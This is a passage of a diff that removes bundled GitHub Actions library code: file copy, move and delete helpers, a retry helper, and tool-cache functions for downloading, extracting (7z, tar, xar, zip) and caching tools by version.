yield ioUtil.stat(dest) : null; - // Dest is an existing file, but not forcing - if (destStat && destStat.isFile() && !force) { - return; - } - // If dest is an existing directory, should copy inside. - const newDest = destStat && destStat.isDirectory() && copySourceDirectory - ? path.join(dest, path.basename(source)) - : dest; - if (!(yield ioUtil.exists(source))) { - throw new Error(`no such file or directory: ${source}`); - } - const sourceStat = yield ioUtil.stat(source); - if (sourceStat.isDirectory()) { - if (!recursive) { - throw new Error(`Failed to copy. ${source} is a directory, but tried to copy without recursive flag.`); - } - else { - yield cpDirRecursive(source, newDest, 0, force); - } - } - else { - if (path.relative(source, newDest) === '') { - // a file cannot be copied to itself - throw new Error(`'${newDest}' and '${source}' are the same file`); - } - yield copyFile(source, newDest, force); - } - }); -} -exports.cp = cp; -/** - * Moves a path. - * - * @param source source path - * @param dest destination path - * @param options optional. See MoveOptions. 
- */ -function mv(source, dest, options = {}) { - return __awaiter(this, void 0, void 0, function* () { - if (yield ioUtil.exists(dest)) { - let destExists = true; - if (yield ioUtil.isDirectory(dest)) { - // If dest is directory copy src into dest - dest = path.join(dest, path.basename(source)); - destExists = yield ioUtil.exists(dest); - } - if (destExists) { - if (options.force == null || options.force) { - yield rmRF(dest); - } - else { - throw new Error('Destination already exists'); - } - } - } - yield mkdirP(path.dirname(dest)); - yield ioUtil.rename(source, dest); - }); -} -exports.mv = mv; -/** - * Remove a path recursively with force - * - * @param inputPath path to remove - */ -function rmRF(inputPath) { - return __awaiter(this, void 0, void 0, function* () { - if (ioUtil.IS_WINDOWS) { - // Check for invalid characters - // https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file - if (/[*"<>|]/.test(inputPath)) { - throw new Error('File path must not contain `*`, `"`, `<`, `>` or `|` on Windows'); - } - } - try { - // note if path does not exist, error is silent - yield ioUtil.rm(inputPath, { - force: true, - maxRetries: 3, - recursive: true, - retryDelay: 300 - }); - } - catch (err) { - throw new Error(`File was unable to be removed ${err}`); - } - }); -} -exports.rmRF = rmRF; -/** - * Make a directory. Creates the full path with folders in between - * Will throw if it fails - * - * @param fsPath path to create - * @returns Promise - */ -function mkdirP(fsPath) { - return __awaiter(this, void 0, void 0, function* () { - assert_1.ok(fsPath, 'a path argument must be provided'); - yield ioUtil.mkdir(fsPath, { recursive: true }); - }); -} -exports.mkdirP = mkdirP; -/** - * Returns path of a tool had the tool actually been invoked. Resolves via paths. - * If you check and the tool does not exist, it will throw. 
- * - * @param tool name of the tool - * @param check whether to check if tool exists - * @returns Promise path to tool - */ -function which(tool, check) { - return __awaiter(this, void 0, void 0, function* () { - if (!tool) { - throw new Error("parameter 'tool' is required"); - } - // recursive when check=true - if (check) { - const result = yield which(tool, false); - if (!result) { - if (ioUtil.IS_WINDOWS) { - throw new Error(`Unable to locate executable file: ${tool}. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also verify the file has a valid extension for an executable file.`); - } - else { - throw new Error(`Unable to locate executable file: ${tool}. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also check the file mode to verify the file is executable.`); - } - } - return result; - } - const matches = yield findInPath(tool); - if (matches && matches.length > 0) { - return matches[0]; - } - return ''; - }); -} -exports.which = which; -/** - * Returns a list of all occurrences of the given tool on the system path. - * - * @returns Promise the paths of the tool - */ -function findInPath(tool) { - return __awaiter(this, void 0, void 0, function* () { - if (!tool) { - throw new Error("parameter 'tool' is required"); - } - // build the list of extensions to try - const extensions = []; - if (ioUtil.IS_WINDOWS && process.env['PATHEXT']) { - for (const extension of process.env['PATHEXT'].split(path.delimiter)) { - if (extension) { - extensions.push(extension); - } - } - } - // if it's rooted, return it if exists. otherwise return empty. 
- if (ioUtil.isRooted(tool)) { - const filePath = yield ioUtil.tryGetExecutablePath(tool, extensions); - if (filePath) { - return [filePath]; - } - return []; - } - // if any path separators, return empty - if (tool.includes(path.sep)) { - return []; - } - // build the list of directories - // - // Note, technically "where" checks the current directory on Windows. From a toolkit perspective, - // it feels like we should not do this. Checking the current directory seems like more of a use - // case of a shell, and the which() function exposed by the toolkit should strive for consistency - // across platforms. - const directories = []; - if (process.env.PATH) { - for (const p of process.env.PATH.split(path.delimiter)) { - if (p) { - directories.push(p); - } - } - } - // find all matches - const matches = []; - for (const directory of directories) { - const filePath = yield ioUtil.tryGetExecutablePath(path.join(directory, tool), extensions); - if (filePath) { - matches.push(filePath); - } - } - return matches; - }); -} -exports.findInPath = findInPath; -function readCopyOptions(options) { - const force = options.force == null ? true : options.force; - const recursive = Boolean(options.recursive); - const copySourceDirectory = options.copySourceDirectory == null - ? 
true - : Boolean(options.copySourceDirectory); - return { force, recursive, copySourceDirectory }; -} -function cpDirRecursive(sourceDir, destDir, currentDepth, force) { - return __awaiter(this, void 0, void 0, function* () { - // Ensure there is not a run away recursive copy - if (currentDepth >= 255) - return; - currentDepth++; - yield mkdirP(destDir); - const files = yield ioUtil.readdir(sourceDir); - for (const fileName of files) { - const srcFile = `${sourceDir}/${fileName}`; - const destFile = `${destDir}/${fileName}`; - const srcFileStat = yield ioUtil.lstat(srcFile); - if (srcFileStat.isDirectory()) { - // Recurse - yield cpDirRecursive(srcFile, destFile, currentDepth, force); - } - else { - yield copyFile(srcFile, destFile, force); - } - } - // Change the mode for the newly created directory - yield ioUtil.chmod(destDir, (yield ioUtil.stat(sourceDir)).mode); - }); -} -// Buffered file copy -function copyFile(srcFile, destFile, force) { - return __awaiter(this, void 0, void 0, function* () { - if ((yield ioUtil.lstat(srcFile)).isSymbolicLink()) { - // unlink/re-link it - try { - yield ioUtil.lstat(destFile); - yield ioUtil.unlink(destFile); - } - catch (e) { - // Try to override file permission - if (e.code === 'EPERM') { - yield ioUtil.chmod(destFile, '0666'); - yield ioUtil.unlink(destFile); - } - // other errors = it doesn't exist, no work to do - } - // Copy over symlink - const symlinkFull = yield ioUtil.readlink(srcFile); - yield ioUtil.symlink(symlinkFull, destFile, ioUtil.IS_WINDOWS ? 'junction' : null); - } - else if (!(yield ioUtil.exists(destFile)) || force) { - yield ioUtil.copyFile(srcFile, destFile); - } - }); -} -//# sourceMappingURL=io.js.map - -/***/ }), - -/***/ 2473: -/***/ (function(module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? 
(function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports._readLinuxVersionFile = exports._getOsVersion = exports._findMatch = void 0; -const semver = __importStar(__nccwpck_require__(5911)); -const core_1 = __nccwpck_require__(2186); -// needs to be require for core node modules to be mocked -/* eslint @typescript-eslint/no-require-imports: 0 */ -const os = __nccwpck_require__(2037); -const cp = __nccwpck_require__(2081); -const fs = __nccwpck_require__(7147); -function _findMatch(versionSpec, stable, candidates, archFilter) { - return __awaiter(this, void 0, void 0, function* () { - const platFilter = os.platform(); - let result; - let match; - let file; - for (const candidate of candidates) { - const version = candidate.version; - core_1.debug(`check ${version} satisfies ${versionSpec}`); - if (semver.satisfies(version, versionSpec) && - (!stable || candidate.stable === stable)) { - file = candidate.files.find(item => { - core_1.debug(`${item.arch}===${archFilter} && ${item.platform}===${platFilter}`); - let chk = item.arch === archFilter && item.platform === platFilter; - if (chk && item.platform_version) { - const osVersion = module.exports._getOsVersion(); - if (osVersion === item.platform_version) { - chk = true; - } - else { - chk = semver.satisfies(osVersion, item.platform_version); - } - } - return chk; - }); - if (file) { - core_1.debug(`matched ${candidate.version}`); - match = candidate; - break; - } - } - } - if (match && file) { - // clone since we're mutating the file list to be only the file that matches - result = Object.assign({}, match); - result.files = [file]; - } - return result; - }); -} -exports._findMatch = _findMatch; -function _getOsVersion() { - // TODO: add windows and other linux, arm variants - // right now filtering on version is only an ubuntu and macos scenario 
for tools we build for hosted (python) - const plat = os.platform(); - let version = ''; - if (plat === 'darwin') { - version = cp.execSync('sw_vers -productVersion').toString(); - } - else if (plat === 'linux') { - // lsb_release process not in some containers, readfile - // Run cat /etc/lsb-release - // DISTRIB_ID=Ubuntu - // DISTRIB_RELEASE=18.04 - // DISTRIB_CODENAME=bionic - // DISTRIB_DESCRIPTION="Ubuntu 18.04.4 LTS" - const lsbContents = module.exports._readLinuxVersionFile(); - if (lsbContents) { - const lines = lsbContents.split('\n'); - for (const line of lines) { - const parts = line.split('='); - if (parts.length === 2 && - (parts[0].trim() === 'VERSION_ID' || - parts[0].trim() === 'DISTRIB_RELEASE')) { - version = parts[1] - .trim() - .replace(/^"/, '') - .replace(/"$/, ''); - break; - } - } - } - } - return version; -} -exports._getOsVersion = _getOsVersion; -function _readLinuxVersionFile() { - const lsbReleaseFile = '/etc/lsb-release'; - const osReleaseFile = '/etc/os-release'; - let contents = ''; - if (fs.existsSync(lsbReleaseFile)) { - contents = fs.readFileSync(lsbReleaseFile).toString(); - } - else if (fs.existsSync(osReleaseFile)) { - contents = fs.readFileSync(osReleaseFile).toString(); - } - return contents; -} -exports._readLinuxVersionFile = _readLinuxVersionFile; -//# sourceMappingURL=manifest.js.map - -/***/ }), - -/***/ 8279: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.RetryHelper = void 0; -const core = __importStar(__nccwpck_require__(2186)); -/** - * Internal class for retries - */ -class RetryHelper { - constructor(maxAttempts, minSeconds, maxSeconds) { - if (maxAttempts < 1) { - throw new Error('max attempts should be greater than or equal to 1'); - } - this.maxAttempts = maxAttempts; - this.minSeconds = Math.floor(minSeconds); - this.maxSeconds = Math.floor(maxSeconds); - if (this.minSeconds > this.maxSeconds) { - throw new Error('min seconds should be less than or equal to max seconds'); - } - } - execute(action, isRetryable) { - return __awaiter(this, void 0, void 0, function* () { - let attempt = 1; - while (attempt < this.maxAttempts) { - // Try - try { - return yield action(); - } - catch (err) { - if (isRetryable && !isRetryable(err)) { - throw err; - } - 
core.info(err.message); - } - // Sleep - const seconds = this.getSleepAmount(); - core.info(`Waiting ${seconds} seconds before trying again`); - yield this.sleep(seconds); - attempt++; - } - // Last attempt - return yield action(); - }); - } - getSleepAmount() { - return (Math.floor(Math.random() * (this.maxSeconds - this.minSeconds + 1)) + - this.minSeconds); - } - sleep(seconds) { - return __awaiter(this, void 0, void 0, function* () { - return new Promise(resolve => setTimeout(resolve, seconds * 1000)); - }); - } -} -exports.RetryHelper = RetryHelper; -//# sourceMappingURL=retry-helper.js.map - -/***/ }), - -/***/ 7784: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -var __importDefault = (this && this.__importDefault) || function (mod) { - return (mod && mod.__esModule) ? mod : { "default": mod }; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.evaluateVersions = exports.isExplicitVersion = exports.findFromManifest = exports.getManifestFromRepo = exports.findAllVersions = exports.find = exports.cacheFile = exports.cacheDir = exports.extractZip = exports.extractXar = exports.extractTar = exports.extract7z = exports.downloadTool = exports.HTTPError = void 0; -const core = __importStar(__nccwpck_require__(2186)); -const io = __importStar(__nccwpck_require__(7436)); -const fs = __importStar(__nccwpck_require__(7147)); -const mm = __importStar(__nccwpck_require__(2473)); -const os = __importStar(__nccwpck_require__(2037)); -const path = __importStar(__nccwpck_require__(1017)); -const httpm = __importStar(__nccwpck_require__(6255)); -const semver = __importStar(__nccwpck_require__(5911)); -const stream = __importStar(__nccwpck_require__(2781)); -const util = __importStar(__nccwpck_require__(3837)); -const assert_1 = __nccwpck_require__(9491); -const v4_1 = __importDefault(__nccwpck_require__(7468)); -const exec_1 = __nccwpck_require__(1514); -const retry_helper_1 = __nccwpck_require__(8279); -class HTTPError extends Error { - constructor(httpStatusCode) { - super(`Unexpected HTTP response: ${httpStatusCode}`); - this.httpStatusCode = httpStatusCode; - Object.setPrototypeOf(this, new.target.prototype); - 
} -} -exports.HTTPError = HTTPError; -const IS_WINDOWS = process.platform === 'win32'; -const IS_MAC = process.platform === 'darwin'; -const userAgent = 'actions/tool-cache'; -/** - * Download a tool from an url and stream it into a file - * - * @param url url of tool to download - * @param dest path to download tool - * @param auth authorization header - * @param headers other headers - * @returns path to downloaded tool - */ -function downloadTool(url, dest, auth, headers) { - return __awaiter(this, void 0, void 0, function* () { - dest = dest || path.join(_getTempDirectory(), v4_1.default()); - yield io.mkdirP(path.dirname(dest)); - core.debug(`Downloading ${url}`); - core.debug(`Destination ${dest}`); - const maxAttempts = 3; - const minSeconds = _getGlobal('TEST_DOWNLOAD_TOOL_RETRY_MIN_SECONDS', 10); - const maxSeconds = _getGlobal('TEST_DOWNLOAD_TOOL_RETRY_MAX_SECONDS', 20); - const retryHelper = new retry_helper_1.RetryHelper(maxAttempts, minSeconds, maxSeconds); - return yield retryHelper.execute(() => __awaiter(this, void 0, void 0, function* () { - return yield downloadToolAttempt(url, dest || '', auth, headers); - }), (err) => { - if (err instanceof HTTPError && err.httpStatusCode) { - // Don't retry anything less than 500, except 408 Request Timeout and 429 Too Many Requests - if (err.httpStatusCode < 500 && - err.httpStatusCode !== 408 && - err.httpStatusCode !== 429) { - return false; - } - } - // Otherwise retry - return true; - }); - }); -} -exports.downloadTool = downloadTool; -function downloadToolAttempt(url, dest, auth, headers) { - return __awaiter(this, void 0, void 0, function* () { - if (fs.existsSync(dest)) { - throw new Error(`Destination file path ${dest} already exists`); - } - // Get the response headers - const http = new httpm.HttpClient(userAgent, [], { - allowRetries: false - }); - if (auth) { - core.debug('set auth'); - if (headers === undefined) { - headers = {}; - } - headers.authorization = auth; - } - const response = yield 
http.get(url, headers); - if (response.message.statusCode !== 200) { - const err = new HTTPError(response.message.statusCode); - core.debug(`Failed to download from "${url}". Code(${response.message.statusCode}) Message(${response.message.statusMessage})`); - throw err; - } - // Download the response body - const pipeline = util.promisify(stream.pipeline); - const responseMessageFactory = _getGlobal('TEST_DOWNLOAD_TOOL_RESPONSE_MESSAGE_FACTORY', () => response.message); - const readStream = responseMessageFactory(); - let succeeded = false; - try { - yield pipeline(readStream, fs.createWriteStream(dest)); - core.debug('download complete'); - succeeded = true; - return dest; - } - finally { - // Error, delete dest before retry - if (!succeeded) { - core.debug('download failed'); - try { - yield io.rmRF(dest); - } - catch (err) { - core.debug(`Failed to delete '${dest}'. ${err.message}`); - } - } - } - }); -} -/** - * Extract a .7z file - * - * @param file path to the .7z file - * @param dest destination directory. Optional. - * @param _7zPath path to 7zr.exe. Optional, for long path support. Most .7z archives do not have this - * problem. If your .7z archive contains very long paths, you can pass the path to 7zr.exe which will - * gracefully handle long paths. By default 7zdec.exe is used because it is a very small program and is - * bundled with the tool lib. However it does not support long paths. 7zr.exe is the reduced command line - * interface, it is smaller than the full command line interface, and it does support long paths. At the - * time of this writing, it is freely available from the LZMA SDK that is available on the 7zip website. - * Be sure to check the current license agreement. If 7zr.exe is bundled with your action, then the path - * to 7zr.exe can be pass to this function. 
- * @returns path to the destination directory - */ -function extract7z(file, dest, _7zPath) { - return __awaiter(this, void 0, void 0, function* () { - assert_1.ok(IS_WINDOWS, 'extract7z() not supported on current OS'); - assert_1.ok(file, 'parameter "file" is required'); - dest = yield _createExtractFolder(dest); - const originalCwd = process.cwd(); - process.chdir(dest); - if (_7zPath) { - try { - const logLevel = core.isDebug() ? '-bb1' : '-bb0'; - const args = [ - 'x', - logLevel, - '-bd', - '-sccUTF-8', - file - ]; - const options = { - silent: true - }; - yield exec_1.exec(`"${_7zPath}"`, args, options); - } - finally { - process.chdir(originalCwd); - } - } - else { - const escapedScript = path - .join(__dirname, '..', 'scripts', 'Invoke-7zdec.ps1') - .replace(/'/g, "''") - .replace(/"|\n|\r/g, ''); // double-up single quotes, remove double quotes and newlines - const escapedFile = file.replace(/'/g, "''").replace(/"|\n|\r/g, ''); - const escapedTarget = dest.replace(/'/g, "''").replace(/"|\n|\r/g, ''); - const command = `& '${escapedScript}' -Source '${escapedFile}' -Target '${escapedTarget}'`; - const args = [ - '-NoLogo', - '-Sta', - '-NoProfile', - '-NonInteractive', - '-ExecutionPolicy', - 'Unrestricted', - '-Command', - command - ]; - const options = { - silent: true - }; - try { - const powershellPath = yield io.which('powershell', true); - yield exec_1.exec(`"${powershellPath}"`, args, options); - } - finally { - process.chdir(originalCwd); - } - } - return dest; - }); -} -exports.extract7z = extract7z; -/** - * Extract a compressed tar archive - * - * @param file path to the tar - * @param dest destination directory. Optional. - * @param flags flags for the tar command to use for extraction. Defaults to 'xz' (extracting gzipped tars). Optional. 
- * @returns path to the destination directory - */ -function extractTar(file, dest, flags = 'xz') { - return __awaiter(this, void 0, void 0, function* () { - if (!file) { - throw new Error("parameter 'file' is required"); - } - // Create dest - dest = yield _createExtractFolder(dest); - // Determine whether GNU tar - core.debug('Checking tar --version'); - let versionOutput = ''; - yield exec_1.exec('tar --version', [], { - ignoreReturnCode: true, - silent: true, - listeners: { - stdout: (data) => (versionOutput += data.toString()), - stderr: (data) => (versionOutput += data.toString()) - } - }); - core.debug(versionOutput.trim()); - const isGnuTar = versionOutput.toUpperCase().includes('GNU TAR'); - // Initialize args - let args; - if (flags instanceof Array) { - args = flags; - } - else { - args = [flags]; - } - if (core.isDebug() && !flags.includes('v')) { - args.push('-v'); - } - let destArg = dest; - let fileArg = file; - if (IS_WINDOWS && isGnuTar) { - args.push('--force-local'); - destArg = dest.replace(/\\/g, '/'); - // Technically only the dest needs to have `/` but for aesthetic consistency - // convert slashes in the file arg too. - fileArg = file.replace(/\\/g, '/'); - } - if (isGnuTar) { - // Suppress warnings when using GNU tar to extract archives created by BSD tar - args.push('--warning=no-unknown-keyword'); - args.push('--overwrite'); - } - args.push('-C', destArg, '-f', fileArg); - yield exec_1.exec(`tar`, args); - return dest; - }); -} -exports.extractTar = extractTar; -/** - * Extract a xar compatible archive - * - * @param file path to the archive - * @param dest destination directory. Optional. - * @param flags flags for the xar. Optional. 
- * @returns path to the destination directory - */ -function extractXar(file, dest, flags = []) { - return __awaiter(this, void 0, void 0, function* () { - assert_1.ok(IS_MAC, 'extractXar() not supported on current OS'); - assert_1.ok(file, 'parameter "file" is required'); - dest = yield _createExtractFolder(dest); - let args; - if (flags instanceof Array) { - args = flags; - } - else { - args = [flags]; - } - args.push('-x', '-C', dest, '-f', file); - if (core.isDebug()) { - args.push('-v'); - } - const xarPath = yield io.which('xar', true); - yield exec_1.exec(`"${xarPath}"`, _unique(args)); - return dest; - }); -} -exports.extractXar = extractXar; -/** - * Extract a zip - * - * @param file path to the zip - * @param dest destination directory. Optional. - * @returns path to the destination directory - */ -function extractZip(file, dest) { - return __awaiter(this, void 0, void 0, function* () { - if (!file) { - throw new Error("parameter 'file' is required"); - } - dest = yield _createExtractFolder(dest); - if (IS_WINDOWS) { - yield extractZipWin(file, dest); - } - else { - yield extractZipNix(file, dest); - } - return dest; - }); -} -exports.extractZip = extractZip; -function extractZipWin(file, dest) { - return __awaiter(this, void 0, void 0, function* () { - // build the powershell command - const escapedFile = file.replace(/'/g, "''").replace(/"|\n|\r/g, ''); // double-up single quotes, remove double quotes and newlines - const escapedDest = dest.replace(/'/g, "''").replace(/"|\n|\r/g, ''); - const pwshPath = yield io.which('pwsh', false); - //To match the file overwrite behavior on nix systems, we use the overwrite = true flag for ExtractToDirectory - //and the -Force flag for Expand-Archive as a fallback - if (pwshPath) { - //attempt to use pwsh with ExtractToDirectory, if this fails attempt Expand-Archive - const pwshCommand = [ - `$ErrorActionPreference = 'Stop' ;`, - `try { Add-Type -AssemblyName System.IO.Compression.ZipFile } catch { } ;`, - `try { 
[System.IO.Compression.ZipFile]::ExtractToDirectory('${escapedFile}', '${escapedDest}', $true) }`, - `catch { if (($_.Exception.GetType().FullName -eq 'System.Management.Automation.MethodException') -or ($_.Exception.GetType().FullName -eq 'System.Management.Automation.RuntimeException') ){ Expand-Archive -LiteralPath '${escapedFile}' -DestinationPath '${escapedDest}' -Force } else { throw $_ } } ;` - ].join(' '); - const args = [ - '-NoLogo', - '-NoProfile', - '-NonInteractive', - '-ExecutionPolicy', - 'Unrestricted', - '-Command', - pwshCommand - ]; - core.debug(`Using pwsh at path: ${pwshPath}`); - yield exec_1.exec(`"${pwshPath}"`, args); - } - else { - const powershellCommand = [ - `$ErrorActionPreference = 'Stop' ;`, - `try { Add-Type -AssemblyName System.IO.Compression.FileSystem } catch { } ;`, - `if ((Get-Command -Name Expand-Archive -Module Microsoft.PowerShell.Archive -ErrorAction Ignore)) { Expand-Archive -LiteralPath '${escapedFile}' -DestinationPath '${escapedDest}' -Force }`, - `else {[System.IO.Compression.ZipFile]::ExtractToDirectory('${escapedFile}', '${escapedDest}', $true) }` - ].join(' '); - const args = [ - '-NoLogo', - '-Sta', - '-NoProfile', - '-NonInteractive', - '-ExecutionPolicy', - 'Unrestricted', - '-Command', - powershellCommand - ]; - const powershellPath = yield io.which('powershell', true); - core.debug(`Using powershell at path: ${powershellPath}`); - yield exec_1.exec(`"${powershellPath}"`, args); - } - }); -} -function extractZipNix(file, dest) { - return __awaiter(this, void 0, void 0, function* () { - const unzipPath = yield io.which('unzip', true); - const args = [file]; - if (!core.isDebug()) { - args.unshift('-q'); - } - args.unshift('-o'); //overwrite with -o, otherwise a prompt is shown which freezes the run - yield exec_1.exec(`"${unzipPath}"`, args, { cwd: dest }); - }); -} -/** - * Caches a directory and installs it into the tool cacheDir - * - * @param sourceDir the directory to cache into tools - * @param tool tool 
name - * @param version version of the tool. semver format - * @param arch architecture of the tool. Optional. Defaults to machine architecture - */ -function cacheDir(sourceDir, tool, version, arch) { - return __awaiter(this, void 0, void 0, function* () { - version = semver.clean(version) || version; - arch = arch || os.arch(); - core.debug(`Caching tool ${tool} ${version} ${arch}`); - core.debug(`source dir: ${sourceDir}`); - if (!fs.statSync(sourceDir).isDirectory()) { - throw new Error('sourceDir is not a directory'); - } - // Create the tool dir - const destPath = yield _createToolPath(tool, version, arch); - // copy each child item. do not move. move can fail on Windows - // due to anti-virus software having an open handle on a file. - for (const itemName of fs.readdirSync(sourceDir)) { - const s = path.join(sourceDir, itemName); - yield io.cp(s, destPath, { recursive: true }); - } - // write .complete - _completeToolPath(tool, version, arch); - return destPath; - }); -} -exports.cacheDir = cacheDir; -/** - * Caches a downloaded file (GUID) and installs it - * into the tool cache with a given targetName - * - * @param sourceFile the file to cache into tools. Typically a result of downloadTool which is a guid. - * @param targetFile the name of the file name in the tools directory - * @param tool tool name - * @param version version of the tool. semver format - * @param arch architecture of the tool. Optional. Defaults to machine architecture - */ -function cacheFile(sourceFile, targetFile, tool, version, arch) { - return __awaiter(this, void 0, void 0, function* () { - version = semver.clean(version) || version; - arch = arch || os.arch(); - core.debug(`Caching tool ${tool} ${version} ${arch}`); - core.debug(`source file: ${sourceFile}`); - if (!fs.statSync(sourceFile).isFile()) { - throw new Error('sourceFile is not a file'); - } - // create the tool dir - const destFolder = yield _createToolPath(tool, version, arch); - // copy instead of move. 
move can fail on Windows due to - // anti-virus software having an open handle on a file. - const destPath = path.join(destFolder, targetFile); - core.debug(`destination file ${destPath}`); - yield io.cp(sourceFile, destPath); - // write .complete - _completeToolPath(tool, version, arch); - return destFolder; - }); -} -exports.cacheFile = cacheFile; -/** - * Finds the path to a tool version in the local installed tool cache - * - * @param toolName name of the tool - * @param versionSpec version of the tool - * @param arch optional arch. defaults to arch of computer - */ -function find(toolName, versionSpec, arch) { - if (!toolName) { - throw new Error('toolName parameter is required'); - } - if (!versionSpec) { - throw new Error('versionSpec parameter is required'); - } - arch = arch || os.arch(); - // attempt to resolve an explicit version - if (!isExplicitVersion(versionSpec)) { - const localVersions = findAllVersions(toolName, arch); - const match = evaluateVersions(localVersions, versionSpec); - versionSpec = match; - } - // check for the explicit version in the cache - let toolPath = ''; - if (versionSpec) { - versionSpec = semver.clean(versionSpec) || ''; - const cachePath = path.join(_getCacheDirectory(), toolName, versionSpec, arch); - core.debug(`checking cache: ${cachePath}`); - if (fs.existsSync(cachePath) && fs.existsSync(`${cachePath}.complete`)) { - core.debug(`Found tool in cache ${toolName} ${versionSpec} ${arch}`); - toolPath = cachePath; - } - else { - core.debug('not found'); - } - } - return toolPath; -} -exports.find = find; -/** - * Finds the paths to all versions of a tool that are installed in the local tool cache - * - * @param toolName name of the tool - * @param arch optional arch. 
defaults to arch of computer - */ -function findAllVersions(toolName, arch) { - const versions = []; - arch = arch || os.arch(); - const toolPath = path.join(_getCacheDirectory(), toolName); - if (fs.existsSync(toolPath)) { - const children = fs.readdirSync(toolPath); - for (const child of children) { - if (isExplicitVersion(child)) { - const fullPath = path.join(toolPath, child, arch || ''); - if (fs.existsSync(fullPath) && fs.existsSync(`${fullPath}.complete`)) { - versions.push(child); - } - } - } - } - return versions; -} -exports.findAllVersions = findAllVersions; -function getManifestFromRepo(owner, repo, auth, branch = 'master') { - return __awaiter(this, void 0, void 0, function* () { - let releases = []; - const treeUrl = `https://api.github.com/repos/${owner}/${repo}/git/trees/${branch}`; - const http = new httpm.HttpClient('tool-cache'); - const headers = {}; - if (auth) { - core.debug('set auth'); - headers.authorization = auth; - } - const response = yield http.getJson(treeUrl, headers); - if (!response.result) { - return releases; - } - let manifestUrl = ''; - for (const item of response.result.tree) { - if (item.path === 'versions-manifest.json') { - manifestUrl = item.url; - break; - } - } - headers['accept'] = 'application/vnd.github.VERSION.raw'; - let versionsRaw = yield (yield http.get(manifestUrl, headers)).readBody(); - if (versionsRaw) { - // shouldn't be needed but protects against invalid json saved with BOM - versionsRaw = versionsRaw.replace(/^\uFEFF/, ''); - try { - releases = JSON.parse(versionsRaw); - } - catch (_a) { - core.debug('Invalid json'); - } - } - return releases; - }); -} -exports.getManifestFromRepo = getManifestFromRepo; -function findFromManifest(versionSpec, stable, manifest, archFilter = os.arch()) { - return __awaiter(this, void 0, void 0, function* () { - // wrap the internal impl - const match = yield mm._findMatch(versionSpec, stable, manifest, archFilter); - return match; - }); -} -exports.findFromManifest = 
